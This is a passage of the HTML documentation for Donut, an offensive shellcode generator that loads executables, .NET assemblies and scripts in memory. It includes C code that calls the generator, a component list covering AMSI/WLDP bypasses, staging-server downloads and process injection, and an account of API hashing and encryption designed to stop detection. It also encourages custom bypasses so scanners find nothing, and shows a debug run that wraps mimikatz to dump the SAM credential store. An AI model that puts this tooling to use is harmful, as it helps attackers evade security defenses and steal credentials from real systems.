294 _DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
295 _DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span><span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
296 _DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> <span style='color:#400000; '>GetProcAddress</span><span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
297
298 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
299 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
300 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
301 <span style='color:#800080; '>}</span>
302 <span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
303 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.dll.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
304 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
305 <span style='color:#800080; '>}</span>
306 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>else</span>
307 <span style='color:#800000; font-weight:bold; '>void</span> <span style='color:#808030; '>*</span>m <span style='color:#808030; '>=</span> dlopen<span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '>donut.so</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> RTLD_LAZY<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
308 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>m <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
309 _DonutCreate <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutCreate_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutCreate</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
310 _DonutDelete <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutDelete_t<span style='color:#808030; '>)</span>dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutDelete</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
311 _DonutError <span style='color:#808030; '>=</span> <span style='color:#808030; '>(</span>DonutError_t<span style='color:#808030; '>)</span> dlsym<span style='color:#808030; '>(</span>m<span style='color:#808030; '>,</span> <span style='color:#800000; '>"</span><span style='color:#0000e6; '>DonutError</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
312
313 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>_DonutCreate <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutDelete <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span> <span style='color:#808030; '>|</span><span style='color:#808030; '>|</span> _DonutError <span style='color:#808030; '>=</span><span style='color:#808030; '>=</span> <span style='color:#7d0045; '>NULL</span><span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
314 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to resolve Donut API.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
315 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
316 <span style='color:#800080; '>}</span>
317 <span style='color:#800080; '>}</span> <span style='color:#800000; font-weight:bold; '>else</span> <span style='color:#800080; '>{</span>
318 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Unable to load donut.so.</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
319 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
320 <span style='color:#800080; '>}</span>
321 <span style='color:#004a43; '>&#xa0;&#xa0;&#xa0;&#xa0;</span><span style='color:#004a43; '>#</span><span style='color:#004a43; '>endif</span>
322
323 <span style='color:#603000; '>memset</span><span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>,</span> <span style='color:#008c00; '>0</span><span style='color:#808030; '>,</span> <span style='color:#800000; font-weight:bold; '>sizeof</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
324
325 <span style='color:#696969; '>// copy input file</span>
326 <span style='color:#400000; '>lstrcpyn</span><span style='color:#808030; '>(</span>c<span style='color:#808030; '>.</span>input<span style='color:#808030; '>,</span> argv<span style='color:#808030; '>[</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>]</span><span style='color:#808030; '>,</span> DONUT_MAX_NAME<span style='color:#808030; '>-</span><span style='color:#008c00; '>1</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
327
328 <span style='color:#696969; '>// default settings</span>
329 c<span style='color:#808030; '>.</span>inst_type <span style='color:#808030; '>=</span> DONUT_INSTANCE_EMBED<span style='color:#800080; '>;</span> <span style='color:#696969; '>// file is embedded</span>
330 c<span style='color:#808030; '>.</span>arch <span style='color:#808030; '>=</span> DONUT_ARCH_X84<span style='color:#800080; '>;</span> <span style='color:#696969; '>// dual-mode (x86+amd64)</span>
331 c<span style='color:#808030; '>.</span>bypass <span style='color:#808030; '>=</span> DONUT_BYPASS_CONTINUE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// continues loading even if disabling AMSI/WLDP fails</span>
332 c<span style='color:#808030; '>.</span>format <span style='color:#808030; '>=</span> DONUT_FORMAT_BINARY<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default output format</span>
333 c<span style='color:#808030; '>.</span>compress <span style='color:#808030; '>=</span> DONUT_COMPRESS_NONE<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compression is disabled by default</span>
334 c<span style='color:#808030; '>.</span>entropy <span style='color:#808030; '>=</span> DONUT_ENTROPY_DEFAULT<span style='color:#800080; '>;</span> <span style='color:#696969; '>// enable random names + symmetric encryption by default</span>
335 c<span style='color:#808030; '>.</span>exit_opt <span style='color:#808030; '>=</span> DONUT_OPT_EXIT_THREAD<span style='color:#800080; '>;</span> <span style='color:#696969; '>// default behaviour is to exit the thread</span>
336 c<span style='color:#808030; '>.</span>thread <span style='color:#808030; '>=</span> <span style='color:#008c00; '>1</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint as a thread</span>
337 c<span style='color:#808030; '>.</span>unicode <span style='color:#808030; '>=</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// command line will not be converted to unicode for unmanaged DLL function</span>
338
339 <span style='color:#696969; '>// generate the shellcode</span>
340 err <span style='color:#808030; '>=</span> _DonutCreate<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
341 <span style='color:#800000; font-weight:bold; '>if</span><span style='color:#808030; '>(</span>err <span style='color:#808030; '>!</span><span style='color:#808030; '>=</span> DONUT_ERROR_SUCCESS<span style='color:#808030; '>)</span> <span style='color:#800080; '>{</span>
342 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ Error : </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> _DonutError<span style='color:#808030; '>(</span>err<span style='color:#808030; '>)</span><span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
343 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
344 <span style='color:#800080; '>}</span>
345
346 <span style='color:#603000; '>printf</span><span style='color:#808030; '>(</span><span style='color:#800000; '>"</span><span style='color:#0000e6; '> [ loader saved to </span><span style='color:#007997; '>%s</span><span style='color:#0f69ff; '>\n</span><span style='color:#800000; '>"</span><span style='color:#808030; '>,</span> c<span style='color:#808030; '>.</span>output<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
347
348 _DonutDelete<span style='color:#808030; '>(</span><span style='color:#808030; '>&amp;</span>c<span style='color:#808030; '>)</span><span style='color:#800080; '>;</span>
349 <span style='color:#800000; font-weight:bold; '>return</span> <span style='color:#008c00; '>0</span><span style='color:#800080; '>;</span>
350 <span style='color:#800080; '>}</span>
351 </pre>
352
353 <h2>Internals</h2>
354
355 <p>Everything that follows concerns internal workings of Donut and is not required knowledge to generate the shellcode/loader.</p>
356
357 <h2 id="com">6. Donut Components</h2>
358
359 <p>The following table lists the name of each file and what it's used for.</p>
360
361 <table border="1">
362 <tr>
363 <th>File</th>
364 <th>Description</th>
365 </tr>
366 <tr>
367 <td>donut.c</td>
368 <td>Main file for the shellcode generator.</td>
369 </tr>
370 <tr>
371 <td>include/donut.h</td>
372 <td>C header file used by the generator.</td>
373 </tr>
374 <tr>
375 <td>lib/donut.dll and lib/donut.lib</td>
376 <td>Dynamic and static libraries for Microsoft Windows.</td>
377 </tr>
378 <tr>
379 <td>lib/donut.so and lib/donut.a</td>
380 <td>Dynamic and static libraries for Linux.</td>
381 </tr>
382 <tr>
383 <td>lib/donut.h</td>
384 <td>C header file to be used in C/C++ based projects.</td>
385 </tr>
386 <tr>
387 <td>donutmodule.c</td>
388 <td>The CPython wrapper for Donut. Used by the Python module.</td>
389 </tr>
390 <tr>
391 <td>setup.py</td>
392 <td>The setup file for installing Donut as a Pip Python3 module.</td>
393 </tr>
394 <tr>
395 <td>hash.c</td>
396 <td>Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.</td>
397 </tr>
398 <tr>
399 <td>encrypt.c</td>
400 <td>Chaskey block cipher for encrypting modules.</td>
401 </tr>
402 <tr>
403 <td>loader/loader.c</td>
404 <td>Main file for the shellcode.</td>
405 </tr>
406 <tr>
407 <td>loader/inmem_dotnet.c</td>
408 <td>In-Memory loader for .NET EXE/DLL assemblies.</td>
409 </tr>
410 <tr>
411 <td>loader/inmem_pe.c</td>
412 <td>In-Memory loader for EXE/DLL files.</td>
413 </tr>
414 <tr>
415 <td>loader/inmem_script.c</td>
416 <td>In-Memory loader for VBScript/JScript files.</td>
417 </tr>
418 <tr>
419 <td>loader/activescript.c</td>
420 <td>ActiveScriptSite interface required for in-memory execution of VBS/JS files.</td>
421 </tr>
422 <tr>
423 <td>loader/wscript.c</td>
424 <td>Supports a number of WScript methods that cscript/wscript support.</td>
425 </tr>
426 <tr>
427 <td>loader/depack.c</td>
428 <td>Supports unpacking of modules compressed with aPLib.</td>
429 </tr>
430 <tr>
431 <td>loader/bypass.c</td>
432 <td>Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP).</td>
433 </tr>
434 <tr>
435 <td>loader/http_client.c</td>
436 <td>Downloads a module from remote staging server into memory.</td>
437 </tr>
438 <tr>
439 <td>loader/peb.c</td>
440 <td>Used to resolve the address of DLL functions via Process Environment Block (PEB).</td>
441 </tr>
442 <tr>
443 <td>loader/clib.c</td>
444 <td>Replaces common C library functions like memcmp, memcpy and memset.</td>
445 </tr>
446 <tr>
447 <td>loader/getpc.c</td>
448 <td>Assembly code stub to return the value of the EIP register.</td>
449 </tr>
450 <tr>
451 <td>loader/inject.c</td>
452 <td>Simple process injector for Windows that can be used for testing the loader.</td>
453 </tr>
454 <tr>
455 <td>loader/runsc.c</td>
456 <td>Simple shellcode runner for Linux and Windows that can be used for testing the loader.</td>
457 </tr>
458 <tr>
459 <td>loader/exe2h/exe2h.c</td>
460 <td>Extracts the machine code from compiled loader and saves as array to C header and Go files.</td>
461 </tr>
462 </table>
463
464 <h2 id="instance">7. Donut Instance</h2>
465
466 <p>The loader will always contain an <var>Instance</var> which can be viewed simply as a configuration. It will contain all the data that would normally be stored on the stack or in the <code>.data</code> and <code>.rodata</code> sections of an executable. Once the main code executes, if encryption is enabled, it will decrypt the data before attempting to resolve the address of API functions. If successful, it will check if an executable file is embedded or must be downloaded from a remote staging server. To verify successful decryption of a module, a randomly generated string stored in the <code>sig</code> field is hashed using <var>Maru</var> and compared with the value of <code>mac</code>. The data will be decompressed if required and only then is it loaded into memory for execution.</p>
467
468 <h2 id="module">8. Donut Module</h2>
469
470 <p>Modules can be embedded in an <var>Instance</var> or stored on a remote HTTP server.</p>
471
472 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_MODULE <span style='color:#800080; '>{</span>
473 <span style='color:#800000; font-weight:bold; '>int</span> type<span style='color:#800080; '>;</span> <span style='color:#696969; '>// EXE/DLL/JS/VBS</span>
474 <span style='color:#800000; font-weight:bold; '>int</span> thread<span style='color:#800080; '>;</span> <span style='color:#696969; '>// run entrypoint of unmanaged EXE as a thread</span>
475 <span style='color:#800000; font-weight:bold; '>int</span> compress<span style='color:#800080; '>;</span> <span style='color:#696969; '>// indicates engine used for compression</span>
476
477 <span style='color:#800000; font-weight:bold; '>char</span> runtime<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// runtime version for .NET EXE/DLL</span>
478 <span style='color:#800000; font-weight:bold; '>char</span> domain<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// domain name to use for .NET EXE/DLL</span>
479 <span style='color:#800000; font-weight:bold; '>char</span> cls<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of class and optional namespace for .NET EXE/DLL</span>
480 <span style='color:#800000; font-weight:bold; '>char</span> method<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// name of method to invoke for .NET DLL or api for unmanaged DLL</span>
481
482 <span style='color:#800000; font-weight:bold; '>char</span> param<span style='color:#808030; '>[</span>DONUT_MAX_NAME<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string parameters for both managed and unmanaged DLL/EXE</span>
483 <span style='color:#800000; font-weight:bold; '>int</span> unicode<span style='color:#800080; '>;</span> <span style='color:#696969; '>// convert param to unicode before passing to DLL function</span>
484
485 <span style='color:#800000; font-weight:bold; '>char</span> sig<span style='color:#808030; '>[</span>DONUT_SIG_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// string to verify decryption</span>
486 uint64_t mac<span style='color:#800080; '>;</span> <span style='color:#696969; '>// hash of sig, to verify decryption was ok</span>
487
488 uint32_t zlen<span style='color:#800080; '>;</span> <span style='color:#696969; '>// compressed size of EXE/DLL/JS/VBS file</span>
489 uint32_t len<span style='color:#800080; '>;</span> <span style='color:#696969; '>// real size of EXE/DLL/JS/VBS file</span>
490 uint8_t data<span style='color:#808030; '>[</span><span style='color:#008c00; '>4</span><span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// data of EXE/DLL/JS/VBS file</span>
491 <span style='color:#800080; '>}</span> DONUT_MODULE<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_MODULE<span style='color:#800080; '>;</span>
492 </pre>
493
494 <h2 id="hashing">9. Win32 API Hashing</h2>
495
496 <p>A hash function called <a href="https://github.com/odzhan/maru">Maru</a> is used to resolve the address of API at runtime. It uses a Davies-Meyer construction and the <a href="https://tinycrypt.wordpress.com/2017/01/11/asmcodes-speck/">SPECK</a> block cipher to derive a 64-bit hash from an API string. The padding is similar to what's used by MD4 and MD5 except only 32-bits of the string length are stored in the buffer instead of 64-bits. An initial value (IV) chosen randomly ensures the 64-bit API hashes are unique for each instance and cannot be used for detection of Donut. Future releases will likely support alternative methods of resolving address of API to decrease chance of detection.</p>
497
498 <h2 id="encryption">10. Symmetric Encryption</h2>
499
500 <p>The following structure is used to hold a master key, counter and nonce for Donut, which are generated randomly.</p>
501
502 <pre style='color:#000000;background:#ffffff;'><span style='color:#800000; font-weight:bold; '>typedef</span> <span style='color:#800000; font-weight:bold; '>struct</span> _DONUT_CRYPT <span style='color:#800080; '>{</span>
503 <span style='color:#603000; '>BYTE</span> mk<span style='color:#808030; '>[</span>DONUT_KEY_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// master key</span>
504 <span style='color:#603000; '>BYTE</span> ctr<span style='color:#808030; '>[</span>DONUT_BLK_LEN<span style='color:#808030; '>]</span><span style='color:#800080; '>;</span> <span style='color:#696969; '>// counter + nonce</span>
505 <span style='color:#800080; '>}</span> DONUT_CRYPT<span style='color:#808030; '>,</span> <span style='color:#808030; '>*</span>PDONUT_CRYPT<span style='color:#800080; '>;</span>
506 </pre>
507
508 <p><a href="https://tinycrypt.wordpress.com/2017/02/20/asmcodes-chaskey-cipher/">Chaskey</a>, a 128-bit block cipher with support for 128-bit keys, is used in Counter (CTR) mode to decrypt a <var>Module</var> or an <var>Instance</var> at runtime. If an adversary discovers a staging server, it should not be feasible for them to decrypt a donut module without the key which is stored in the donut loader. Future releases will support downloading a key via DNS and also asymmetric encryption.</p>
509
510 <h2 id="bypass">11. Bypasses for AMSI/WLDP</h2>
511
512 <p>Donut includes a bypass system for AMSI and WLDP. Currently, Donut can bypass:</p>
513
514 <ul>
515 <li>AMSI in .NET v4.8</li>
516 <li>Device Guard policy preventing dynamically generated code from executing.</li>
517 </ul>
518
519 <p>You may customize our bypasses or add your own. The bypass logic is defined in loader/bypass.c. Each bypass implements the DisableAMSI with the signature <code>BOOL DisableAMSI(PDONUT_INSTANCE inst)</code> and DisableWLDP with <code>BOOL DisableWLDP(PDONUT_INSTANCE inst)</code>, both of which have a corresponding preprocessor directive. We have several <code>#if defined</code> blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass for AMSI is called <code>BYPASS_AMSI_A</code>. If donut is built with that variable defined, then that bypass will be used.</p>
520
521 <p>Why do it this way? Because it means that only the bypass you are using is built into loader.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.</p>
522
523 <p>Another benefit of this design is that you may write your own AMSI/WLDP bypass. To build Donut with your new bypass, use an <code>if defined</code> block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.</p>
524
525 <p>If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded.</p>
526
527 <h2 id="debug">12. Debugging The Generator and Loader</h2>
528
529 <p>The loader is capable of displaying detailed information about each step of file execution and can be useful in tracking down bugs. To build a debug-enabled executable, specify the debug label with nmake/make on Windows.</p>
530
531 <pre>
532 nmake debug -f Makefile.msvc
533 make debug -f Makefile.mingw
534 </pre>
535
536 <p>Use Donut to create a shellcode as you normally would and a file called <code>instance</code> will be saved to disk. The following example embeds mimikatz.exe in the loader using the Xpress Huffman compression algorithm. It also tells the loader to run the entrypoint as a thread, so that when mimikatz calls an exit-related API, it simply exits the thread. </p>
537
538 <pre>
539 C:\hub\donut>donut -t -z5 mimikatz.exe -p"lsadump::sam exit"
540
541 [ Donut shellcode generator v0.9.3
542 [ Copyright (c) 2019 TheWover, Odzhan
543
544 DEBUG: donut.c:1505:DonutCreate(): Entering.
545 DEBUG: donut.c:1283:validate_loader_cfg(): Validating loader configuration.
546 DEBUG: donut.c:1380:validate_loader_cfg(): Loader configuration passed validation.
547 DEBUG: donut.c:459:read_file_info(): Entering.
548 DEBUG: donut.c:467:read_file_info(): Checking extension of mimikatz.exe
549 DEBUG: donut.c:475:read_file_info(): Extension is ".exe"
550 DEBUG: donut.c:491:read_file_info(): File is EXE
551 DEBUG: donut.c:503:read_file_info(): Mapping mimikatz.exe into memory
552 DEBUG: donut.c:245:map_file(): Entering.
553 DEBUG: donut.c:531:read_file_info(): Checking characteristics
554 DEBUG: donut.c:582:read_file_info(): Leaving with error : 0
555 DEBUG: donut.c:1446:validate_file_cfg(): Validating configuration for input file.
556 DEBUG: donut.c:1488:validate_file_cfg(): Validation passed.
557 DEBUG: donut.c:674:build_module(): Entering.
558 DEBUG: donut.c:381:compress_file(): Reading fragment and workspace size
559 DEBUG: donut.c:387:compress_file(): workspace size : 1415999 | fragment size : 5161
560 DEBUG: donut.c:390:compress_file(): Allocating memory for compressed data.
561 DEBUG: donut.c:396:compress_file(): Compressing 0000024E9D7E0000 to 0000024E9DA50080 with RtlCompressBuffer(XPRESS HUFFMAN)
562 DEBUG: donut.c:433:compress_file(): Original file size : 1013912 | Compressed : 478726
563 DEBUG: donut.c:434:compress_file(): File size reduced by 53%
564 DEBUG: donut.c:436:compress_file(): Leaving with error : 0
565 DEBUG: donut.c:684:build_module(): Assigning 478726 bytes of 0000024E9DA50080 to data
566 DEBUG: donut.c:695:build_module(): Allocating 480054 bytes of memory for DONUT_MODULE
567 DEBUG: donut.c:772:build_module(): Copying data to module
568 DEBUG: donut.c:784:build_module(): Leaving with error : 0
569 DEBUG: donut.c:804:build_instance(): Entering.
570 DEBUG: donut.c:807:build_instance(): Allocating memory for instance
571 DEBUG: donut.c:814:build_instance(): The size of module is 480054 bytes. Adding to size of instance.
572 DEBUG: donut.c:817:build_instance(): Total length of instance : 483718
573 DEBUG: donut.c:846:build_instance(): Generating random key for instance
574 DEBUG: donut.c:855:build_instance(): Generating random key for module
575 DEBUG: donut.c:864:build_instance(): Generating random string to verify decryption
576 DEBUG: donut.c:871:build_instance(): Generating random IV for Maru hash
577 DEBUG: donut.c:879:build_instance(): Generating hashes for API using IV: 546E2FF018FD2A54
578 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : LoadLibraryA = ABB30FFE918BCF83
579 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetProcAddress = EF2C0663C0CDDC21
580 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetModuleHandleA = D40916771ECED480
581 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualAlloc = E445DF6F06219E85
582 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualFree = C6C992D6040B85A8
583 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualQuery = 556BF46109D12C9E
584 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : VirtualProtect = 032546126BB99713
585 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : Sleep = DEB476FF0E3D71E8
586 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : MultiByteToWideChar = A0DD238846F064F4
587 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetUserDefaultLCID = 03DE3865FC2DF17B
588 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : WaitForSingleObject = 40FCB82879AAB610
589 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : CreateThread = 954101E48C1D54F5
590 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetThreadContext = 18669E0FDC3FD0B8
591 DEBUG: donut.c:892:build_instance(): Hash for kernel32.dll : GetCurrentThread = EB6E7C47D574D9F9
592 DEBUG: donut.c:892:build_instance(): Hash for shell32.dll : CommandLineToArgvW = EFD410EF534D57C3
593 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreate = A5AA007611CB6580
594 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayCreateVector = D5CEC16DD247A68A
595 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayPutElement = 6B140B7B87F27359
596 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayDestroy = C2FA65C58C68FC6C
597 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetLBound = ED5A331176BB8DDA
598 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SafeArrayGetUBound = EA0D8BE258DC67DA
599 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysAllocString = 3A7BBDEAA1DC3354
600 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : SysFreeString = EEB92DFE18B7C306
601 DEBUG: donut.c:892:build_instance(): Hash for oleaut32.dll : LoadTypeLib = 687DD816E578C4E7
602 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCrackUrlA = B0F95D86327741EC
603 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetOpenA = BDD70375BB72B131
604 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetConnectA = E74A4DD56C6B3154
605 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetSetOptionA = 527C502C0BC36267
606 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetReadFile = 055C3E8A4CF21475
607 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : InternetCloseHandle = 4D1965E404D783BA
608 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpOpenRequestA = CC736E0143DB8F2A
609 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpSendRequestA = C87BFE8578BB0049
610 DEBUG: donut.c:892:build_instance(): Hash for wininet.dll : HttpQueryInfoA = FC7CC8D82764DFBF
611 DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CorBindToRuntime = 6F6432B588D39C8D
612 DEBUG: donut.c:892:build_instance(): Hash for mscoree.dll : CLRCreateInstance = 2828FB8F68349704
613 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoInitializeEx = 9752F1AA167F8E79
614 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoCreateInstance = 8211344A519AF3BA
615 DEBUG: donut.c:892:build_instance(): Hash for ole32.dll : CoUninitialize = FF0605E1258BEE44
616 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualUnicodeString = D5CEDA5C642834D7
617 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlEqualString = A69EAF72442222A4
618 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlUnicodeStringToAnsiString = 4DBA40D90962E1D6
619 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlInitUnicodeString = A1143A47656B2526
620 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserThread = 62FF88CDC045477E
621 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlExitUserProcess = E20BCE2C11E82C7B
622 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlCreateUnicodeString = A469294ED1E1D8DC
623 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlGetCompressionWorkSpaceSize = 61E26E7C5DD38D2C
624 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : RtlDecompressBufferEx = 145C8CF24F5EAF3E
625 DEBUG: donut.c:892:build_instance(): Hash for ntdll.dll : NtContinue = 12ACA3AD3CC20AF5
626 DEBUG: donut.c:895:build_instance(): Setting number of API to 48
627 DEBUG: donut.c:898:build_instance(): Setting DLL names to ole32;oleaut32;wininet;mscoree;shell32
628 DEBUG: donut.c:941:build_instance(): Copying strings required to bypass AMSI
629 DEBUG: donut.c:949:build_instance(): Copying strings required to bypass WLDP
